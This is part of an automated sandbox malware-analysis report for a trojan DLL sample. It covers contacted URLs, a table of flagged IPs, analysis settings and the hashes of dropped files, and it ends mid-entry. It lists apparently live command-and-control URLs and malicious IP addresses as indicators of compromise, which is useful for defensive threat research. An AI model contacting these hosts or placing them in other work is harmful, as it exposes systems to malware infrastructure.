                  http://intermedia.bar/drew/sJjHsvpax4Nzwn6/j_2BIK7xkvvLg0K_2B/rW_2F1MVm/0X2RDVp6mN6jHjHQXHVv/lXgIE5s{5307E23D-7AD2-11EC-90E9-ECF4BB862DED}.dat.37.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://nnnnnn.casa/drew/y8OOHzBXx4vT2Ja_/2BB0Liu_2F2FEpI/O7IlC7aNtEnJlyf21V/jvmc9z_2B/LgRR93FX60U2LA{3EF5FA3A-7AD2-11EC-90E9-ECF4BB862DED}.dat.29.dr, ~DF1DF67103C7B135B0.TMP.29.drtrue
                  • Avira URL Cloud: malware
                  unknown
                  http://intermedia.barloaddll32.exe, 00000001.00000003.648024255.0000000001167000.00000004.00000001.sdmp, loaddll32.exe, 00000001.00000003.648253117.0000000001167000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000003.349565633.00000000034F1000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000003.648899790.00000000034F2000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000003.460653574.00000000034F2000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000003.565572741.00000000034F2000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000003.648715352.00000000034F2000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.462177448.0000000002794000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.348654283.0000000002793000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://intermedia.bar/drew/QsS2jHAM_/2BwJZccmdp5m9iHVP9BE/Hy_2Bb24NYz6UUYImCo/zrhZsMNoFc_2FvJseSFb87loaddll32.exe, 00000001.00000002.809447258.00000000010EB000.00000004.00000020.sdmp, loaddll32.exe, 00000001.00000002.809814821.0000000001155000.00000004.00000020.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 31.41.46.120 | intermedia.bar | Russian Federation | 56577 | ASRELINKRU | true |
| 198.54.117.218 | parkingpage.namecheap.com | United States | 22612 | NAMECHEAP-NETUS | false |
| 198.54.117.210 | unknown | United States | 22612 | NAMECHEAP-NETUS | true |
| 198.54.117.211 | unknown | United States | 22612 | NAMECHEAP-NETUS | true |
| 198.54.117.212 | unknown | United States | 22612 | NAMECHEAP-NETUS | true |
| 192.64.119.233 | nnnnnn.casa | United States | 22612 | NAMECHEAP-NETUS | true |
| 162.255.119.177 | nnnnnn.bar | United States | 22612 | NAMECHEAP-NETUS | true |
| 198.54.117.215 | unknown | United States | 22612 | NAMECHEAP-NETUS | true |
| 198.54.117.216 | unknown | United States | 22612 | NAMECHEAP-NETUS | true |
                  IP
                  192.168.2.1
                  Joe Sandbox Version:34.0.0 Boulder Opal
                  Analysis ID:557481
                  Start date:21.01.2022
                  Start time:07:51:14
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 10m 20s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Sample file name:Wartless_v8.8.9.0.dll
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:50
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.evad.winDLL@45/99@38/10
                  EGA Information:
                  • Successful, ratio: 100%
                  HDC Information:
                  • Successful, ratio: 72% (good quality ratio 68.5%)
                  • Quality average: 80.4%
                  • Quality standard deviation: 28.5%
                  HCA Information:
                  • Successful, ratio: 88%
                  • Number of executed functions: 144
                  • Number of non-executed functions: 103
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .dll
                  • Override analysis time to 240s for rundll32
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, ielowutil.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                  • Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.203.70.208, 152.199.19.161
                  • Excluded domains from analysis (whitelisted): ie9comview.vo.msecnd.net, tile-service.weather.microsoft.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, e12564.dspb.akamaiedge.net, go.microsoft.com, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, cdn.onenote.net, cs9.wpc.v0cdn.net
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
| Time | Type | Description |
|---|---|---|
| 07:52:26 | API Interceptor | 1x Sleep call for process: regsvr32.exe modified |
| 07:52:26 | API Interceptor | 2x Sleep call for process: rundll32.exe modified |
                  No context
                  No context
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):7168
                  Entropy (8bit):2.8422761351495693
                  Encrypted:false
                  SSDEEP:96:rZyNBiNB4sA9J3dbp3d30cp3W3FdsA9s30igp3d30cp3W3F37M30ix1993d3bb:r8N8N+BuPBzqnE
                  MD5:91215A677A78CF1F56C00A0746E12C9D
                  SHA1:C9FE55A00E7C53C8DAB0E927B20DCDB11FAA8D9C
                  SHA-256:1DD9F6DBBE534A07F84E605C1BE0DEBD275103D4AA6A15E9455943D37802BC9D
                  SHA-512:9EE2F06478B51B7B38E4DE1D4E0AB2C8FFD4D6A74D65DC8F2B71E9580158D4105953E280F0DDEC0BCBB6910657A472009B3A85110AD8946D7707E67148710615
                  Malicious:false
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):7168
                  Entropy (8bit):2.8436831003719587
                  Encrypted:false
                  SSDEEP:96:6BgnB6OJuyzP5NTP53xTPI3tduyW35hTP53xTPI3tN1C3NhFv33y55:hI
                  MD5:A2B34F3791709A881C7D99F7BB1A8D1C
                  SHA1:6E06A75275E4A9F55683BCFC831B9C6494904702
                  SHA-256:D7602F136C404B04A4E1DFD73C351A4D8D8E12EFB52F82153CB16F1AE6865985
                  SHA-512:39301B64830BC13743A1358D2862BC122CF7238BBDAB4667ED6FFC8FFDE14DEFD5B682668DF9A08E8A13C7EEB76D5CBB5DF8C1ED986C80A4C9C6FF4C672763E6
                  Malicious:false
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):7168
                  Entropy (8bit):2.8378504865162175
                  Encrypted:false
                  SSDEEP:96:l7TH+/xQGVPLJ1PL311Pw3s2dQGQ3syk1PL311Pw3s2LvW3Lsxhp3JhPP:lk86
                  MD5:BCA39666CE6AB260B738D05CA744CA55
                  SHA1:DD613BD6C63322BF0BEE1BDC2EF544FAD9E308B7
                  SHA-256:EC29E925496035F90C14E33BDF52C0AB94E9701732E41152782B3E3DDC806A5F
                  SHA-512:B317F2FDC268FE04CF096EDA53918FCFFD1F2666B74A56D601E4C24A3906A28C38FA06537A6F583048C10105EE24A76BDD43BA814880812D0128D2ECC7F69081
                  Malicious:false
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):7168
                  Entropy (8bit):2.8394778196103725
                  Encrypted:false
                  SSDEEP:96:UlJWNx8+t3R7N3R3wkN3c3dd8+iZ3wKON3R3wkN3c3d3bCZ3wKxJx3R177:Tak
                  MD5:7A76FAFFF4B405EF3090816FED72197F
                  SHA1:3EDAD020EE6665C0B437E9A58C37A0552BD8C1C7
                  SHA-256:4935751D3961D1F2731D57B494A3979450BF0D4A439101424728C5812F3C451A
                  SHA-512:2094F8F563FDE381881171DBB5D9235F9A5D6E7F0405CAE9D7A49507F9E46ECA225592957A4DE7FBE5AF802DD3B12B0F5D72D6FAE1373206E5AA8CB7E2B1D6AE
                  Malicious:false
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):2.619527580284413
                  Encrypted:false
                  SSDEEP:48:rbGO5HGIzjEQyCzWA2SBljyNy6H8EfzjEQyCzWA2BljyNy6H8E:l5nz4Izb2mjkyxsz4IzbCjkyx
                  MD5:2650FDA23F8754B3CDC0462834884B48
                  SHA1:D4C58B11F508A466F57AB6B12D084C58351C3D7F
                  SHA-256:9A09F4B8A362CF59B5ED625F0D58E8189E1C24C5772A93E3E72B3D9D08C89E4C
                  SHA-512:247359FB49F2583979C8A74B147CB3EB380C9E871F1CD56D91F73B2DFC28A04A3CDF7E567D85BF7C4848D679A112D8BEF8706D7E2AF6BDCBB1B7B0FDC0E00428
                  Malicious:false
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):2.643601359218418
                  Encrypted:false
                  SSDEEP:48:rGGDjGIcvELTeaYxCHT8McvELTeqCHT8:pyaY6gMy3g
                  MD5:52FDA0ECE5BBD10C6547D76070A1FA8E
                  SHA1:2C76386FC0DB64C40F38320B738D8B275A4594F6
                  SHA-256:A795DED09691F63FF7F8B516A5F8FB10B69BA554FDE5D4B34734AE07E152007A
                  SHA-512:F49C810DD649DD8E7F24D13E3738FC2E3C02D23EEE9A753C426091DA3FF4ACAFFBA396E25055C850AB7F482D3D722927BBB16FAFE11EDD7D77265E9AA6917EBF
                  Malicious:false
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):2.6430303445146546
                  Encrypted:false
                  SSDEEP:24:rOGsGK9lBXslMYzPWE1bMrlQZ0HlAwXfRJyvR4+gi9lRXslMYzPWE1trlQZ0HlAQ:rOGsGIXEvLZqXfvyvvXEv0ZqXfvyv
                  MD5:8886B1546BAFFC51BAEB31272E3435A4
                  SHA1:682C17F34D4D5C15636B88E1D11863DC8F572809
                  SHA-256:E6157D18E00A74E3EEA85BCA896BAAC0311F3D814CE8032905780CA7B52054F1
                  SHA-512:A230AD4FC10AD4C77D952F324C18D35FFCFD6828B13897DF60E83D45EA380D0E85D63239A0809DFF5644187070DBDDFF2B5513B2162BD515B893981B8889F170
                  Malicious:false
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):2.649319825910071
                  Encrypted:false
                  SSDEEP:24:r7GGGK9lBJslMibEHTzAb9taO3zRQPR3ii9lRJslMibEHTzAb9tWB3zRQPR3i:r7GGGIJEr9zR6HJErGzR6
                  MD5:8E3296AEF84F98D1E520EC67FE8DAAC5
                  SHA1:056103B8B29A2691BDBFB47DF53BAF5A00D9FE74
                  SHA-256:A468FF03A263A692202CA04CFAE36238D824784CBC8A8EEEA029C5F14B999B5F
                  SHA-512:8B6DE9DC7CA8AFD85B9B359E868EF63C3505DD7645B25D3E9591F364FD7851CDA142CCCA8E9236D961C3503C06858FD8F0D6273C0787C78E88FDADE1A7D22417
                  Malicious:false
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):2.6439505840090733
                  Encrypted:false
                  SSDEEP:96:GrPPrJqgKaazP15VTuWPrJqgKaau15VTu:GrPPrJvGdb9PrJvvb
                  MD5:E513EE38E69669E88979C863A30A0AA0
                  SHA1:17DD854637F41D752B440D7F6287A0BD574B716C
                  SHA-256:864B3321075B3B6048F5206FFC1FDD24948BE3C5A5AE662F2287C1275FB91912
                  SHA-512:4A37CF6260A473717593224776B07355C65037F8098666914985ECECC660171E9197BD951624FD340134475C0F524293F7CBC2EC1341F7EABD611ABEFF0FE0B3
                  Malicious:false
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):2.644501368353259
                  Encrypted:false
                  SSDEEP:48:rtBrGwHGIFJN9EA7rdUe05vCubPzEn+OTFJN9EA7rdUeUA5vCubPzEn+O:BBpHFJ4srdhgvLbPuzFJ4srdh/vLbPu
                  MD5:D1DE093D301E3171AE592742113F290A
                  SHA1:4DC9756FA7864691E086B4E4E752CEB4DEDBEAA2
                  SHA-256:43FBE3C87E02FA1C749386E05E7463050CF8FCFB1068094FED116DA2BCDC97FC
                  SHA-512:20D0291A1069881ED9F4D6D1841177A569687E82DE4BCA93D0582EE806F7CCDE9200BFE9B1F3E67AE6837DF603553C187E67F84635DDF22680DF0D430CF31610
                  Malicious:false
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):2.647289310233475
                  Encrypted:false
                  SSDEEP:48:rfAGnG2+uNUbEASjjcjQd0DkTYEuNUbEASjjjjQd0DkTY:rF+udfPIkTYEudfPdkTY
                  MD5:F50CD6A3B7AA3290B722B65C9996349C
                  SHA1:7C036E62FACA71CE75B245C4CE660C20B57DFD04
                  SHA-256:FC77DE4EA50485C30C26C89E1DC4166616FDFF0EAB331792890CCE867C9B8E4A
                  SHA-512:54F76C73A87300BF0289E1B6EE46C5CDD7FED8ECA6B8DB8BD7F6ED6E1708D8191AC06C98E1AC6D95CBC6E550352A98A7AC8A1BCD7F6E711DF3DA5E2731FA89EA
                  Malicious:false
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):2.620393355939478
                  Encrypted:false
                  SSDEEP:48:rKGOVGItNEbEAl8TlKZS4qhOyWtNEbEAl8elKZS4qhOy:olt2wtk4it2w2k4
                  MD5:A3B9D48028933EC8A71940CE8CBE07F7
                  SHA1:3187F579C93CD679395DB0EF9B3B6F46ACC08A72
                  SHA-256:013A3EE6E3EC34C5F462B0397ED9FDA37A7AC273CAF7D8B082B17190928DB87E
                  SHA-512:55088D5F96764E21BB3153E261F02E42351474441D4AF971111B2AFADED5814446AE5122D1D17356C231E75968C14FBA77C4285F604631051F726486753E9240
                  Malicious:false
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):5632
                  Entropy (8bit):2.5767651762314236
                  Encrypted:false
                  SSDEEP:48:rxjGwGbWbynNXS2byyTH4onNXS2byyTH4:RynhS83nhS8
                  MD5:34DAECE91A8D67359B7E0320F05C9103
                  SHA1:74686297030C49DC154E30E45D30CE2D1759F960
                  SHA-256:57108AD7B5B0696E9514DFF86B1F51598BC0A7A4FB4679678D724DA2EB9FEB9A
                  SHA-512:DEA199FE8B9B91474C461A7BA59BD47745032F5D8326E3D9AF80C9B98F15E173F776E3CEE8F258A05DAF4E9E532CCA61833C7FD00F2A99371B02764C9309C683
                  Malicious:false
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):2.6563600041266815
                  Encrypted:false
                  SSDEEP:48:ruGUGHhNExZHKwNkRgvCchNExZHKfNkRgv:FhkSgzhbSg
                  MD5:BDBFB2E37DA68771CED9A97179A65E9B
                  SHA1:57E9788175206893CBECC54ACE30098216749A8F
                  SHA-256:6D0513B73FA2CB769AE40CDB1C4366FEE71DC2E99FEE3DE631A330DC9EC13CDD
                  SHA-512:EE231B8175D84E10DEB4091D71230184EC2E122D60CCB78764A5947FDCA4F208D8C1129CC7DC3445D05F64355509DC88160421FC533CAB9004E9232D684EF831
                  Malicious:false
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):2.655738831049053
                  Encrypted:false
                  SSDEEP:48:rpGRG2+UNUGppDqjyL0XseNUNUGppDqmyL0Xse:y+U2GK1U2tK
                  MD5:DBF458279342C29D14FD91535FD96DB9
                  SHA1:929FBB8569F20BEA3005E98542D308D55FDF1194
                  SHA-256:F7B8C65CE67504422EED35587E002BBFDF97F7FCD301038D2BB4600C5DF4137F
                  SHA-512:8E0F75EB1D6983A493C5AACB52DCDC9195426E2E1A74DC8C686CC85D3AC6A5E857F7328933A50CFB39493589683F9463C595077B3839579B5C0932676D94B0D5
                  Malicious:false
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):2.63110531836346
                  Encrypted:false
                  SSDEEP:48:r3GOGO17NUI4173PI3QKnIGl5lh7NUI41W3PI3QKnIGl5l:H17xgoxlF7ygoxl
                  MD5:2E38BE64347354EF4820070EB5FF50A6
                  SHA1:8357B893F3D7EA086C89EEA1F1C87D213079F767
                  SHA-256:6A5F0B4820426EF6A77C6C396F011D7898DFE1A41DA23C4CCBE977F36BC93C59
                  SHA-512:78C4D38CB8F5002A516943758BF9480A0A1C9001A0FE9DAE6EED604B9E572936F09C6C807D71A51253E168D441B5F2D012973991C976244C38A11452F07212BD
                  Malicious:false
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):2.3000853655984947
                  Encrypted:false
                  SSDEEP:24:r1AGjGi9lRxNslRV6UP9juPwd14BlV6UlU+nfVJA:rqGjG0xNER0UJzQDVPl
                  MD5:EF2E5FE62CE986A29E6DAAD6D794D5C4
                  SHA1:E6B3F0B1F7953A6E72245B3037BB4FA49B7E484B
                  SHA-256:BFBD1EF9C4422998E89893D2BE2D8E02A0D0B6F89373DEB096D2866A0F081732
                  SHA-512:9875B60622C2245D749C3CC2E2AB3D881756FC7C60B7D469730511C4A79A642A895D7CDBEB0FC7D9C03991E59CA406C7E101B14235D8874988E2CC73474E8BC7
                  Malicious:false
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):2.3058141640301404
                  Encrypted:false
                  SSDEEP:24:rKGGG2j9l2aNbFdHbbz8xkoG9GxPMN3wYuFQHgYau:rKGGG2qaNbFx+G98SOFQHd
                  MD5:4621B34D663456CEBEEAF0E2647C7F16
                  SHA1:D203587EB7E4B2CD5CCADF585689E196BFE96B82
                  SHA-256:C4B6F4344419E989637FD2493324224A5878EE823D7E64F25093EE34995A07DE
                  SHA-512:74A0C94792CE15799A2F223F16A0F419C6E7B232190B90813115DE1EBFFA9FC387D2AB9A4C17B7206E4EEAF24A214F0A322ABEAE857652DC4D73A66BBAD46E96
                  Malicious:false
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):2.2999943562063536
                  Encrypted:false
                  SSDEEP:24:r6GyGi9lR/N91ISvsiR+T89gPMJ4nM8Wtn:r6GyG0/N9zqT8mUM8
                  MD5:84BB57AE19AD13A58850A8A36B570A07
                  SHA1:9384F8B4360A52746DF666569B20075F7B0E2155
                  SHA-256:57F453F3E810E68389366958A9D3626274A6EA9942F3FC039F41C40A6D749AE2
                  SHA-512:46FBD9E634238BA895C357316466EADA5A08938FBB2CDBE926B9E90A5FFBACE6284F2568BA7680E243440D35C51FED271220A0C74DF520ECE9E86189CC3D294B
                  Malicious:false
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):2.289314617607263
                  Encrypted:false
                  SSDEEP:24:rAGOu60GK9lx6/NJVeYfQ8YhahIc7qLVX2iS7fjmDx+T:rAGOOG86/NJVeYdhT7AVX2iu7mDE
                  MD5:24598DF0D2E57C73F5C66AF6CFA8751A
                  SHA1:2E61FF48854D30EE26DFD7EC1F4BFEADF6B0085B
                  SHA-256:A0C8F979959F3E99EB86DE8B20E0C124E8FD208F83BE69BCC4D8737D83C73701
                  SHA-512:C71B43102B2381BADE219F10EA9FB48E6E36B4960293FB21CABA951370D1F320119626FE78140DD5BFCADEC8E3C8995BE24C441306D8531DAD656927F6A2DAA9
                  Malicious:false
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1612
                  Entropy (8bit):4.869554560514657
                  Encrypted:false
                  SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                  MD5:DFEABDE84792228093A5A270352395B6
                  SHA1:E41258C9576721025926326F76063C2305586F76
                  SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                  SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                  Malicious:false
                  Preview:.body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1612
                  Entropy (8bit):4.869554560514657
                  Encrypted:false
                  SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                  MD5:DFEABDE84792228093A5A270352395B6
                  SHA1:E41258C9576721025926326F76063C2305586F76
                  SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                  SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                  Malicious:false
                  Preview:.body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):2997
                  Entropy (8bit):4.4885437940628465
                  Encrypted:false
                  SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                  MD5:2DC61EB461DA1436F5D22BCE51425660
                  SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                  SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                  SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                  Malicious:false
                  Preview:.<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                  Category:dropped
                  Size (bytes):748
                  Entropy (8bit):7.249606135668305
                  Encrypted:false
                  SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                  MD5:C4F558C4C8B56858F15C09037CD6625A
                  SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                  SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                  SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                  Malicious:false
                  Preview:.PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4720
                  Entropy (8bit):5.164796203267696
                  Encrypted:false
                  SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                  MD5:D65EC06F21C379C87040B83CC1ABAC6B
                  SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                  SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                  SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                  Malicious:false
                  Preview:.//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1612
                  Entropy (8bit):4.869554560514657
                  Encrypted:false
                  SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                  MD5:DFEABDE84792228093A5A270352395B6
